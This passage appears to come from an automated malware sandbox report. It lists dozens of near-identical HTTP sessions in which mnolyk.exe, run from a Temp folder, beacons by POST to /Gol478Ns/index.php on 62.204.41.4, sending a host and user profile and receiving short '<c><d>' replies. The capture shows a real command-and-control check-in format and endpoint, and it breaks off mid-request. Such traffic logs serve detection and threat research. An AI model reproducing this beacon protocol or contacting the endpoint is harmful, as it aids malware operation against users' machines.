                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      492192.168.2.75018762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:14.862061024 CET607OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.928833008 CET607INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      493192.168.2.75018862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:15.102933884 CET608OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.170551062 CET608INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      494192.168.2.75018962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:15.358032942 CET609OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.420347929 CET609INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      495192.168.2.75019062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:15.591789961 CET610OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.653491974 CET610INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      496192.168.2.75019162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:15.842998981 CET611OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.951698065 CET611INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      497192.168.2.75019262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:16.124887943 CET612OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.190716982 CET612INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      498192.168.2.75019362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:16.370707989 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.436515093 CET613INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      499192.168.2.75019462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:16.621524096 CET614OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.685125113 CET614INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.74969962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:02.789716005 CET109OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:02.853396893 CET109INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      50192.168.2.74974562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:13.690917015 CET165OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.755095959 CET165INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      500192.168.2.75019562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:16.860331059 CET615OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.925700903 CET615INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      501192.168.2.75019662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:17.107942104 CET616OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.171992064 CET616INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      502192.168.2.75019762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:17.360534906 CET617OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.425403118 CET617INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      503192.168.2.75019862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:17.611552000 CET618OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.678493023 CET618INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      504192.168.2.75019962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:17.854664087 CET619OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:17.918106079 CET619INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      505192.168.2.75020062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:18.098931074 CET620OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.165523052 CET620INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      506192.168.2.75020162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:18.336544037 CET621OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.399946928 CET621INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      507192.168.2.75020262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:18.573599100 CET622OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.637898922 CET622INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      508192.168.2.75020362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:18.814518929 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:18.880453110 CET623INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      509192.168.2.75020462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:19.062252998 CET624OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
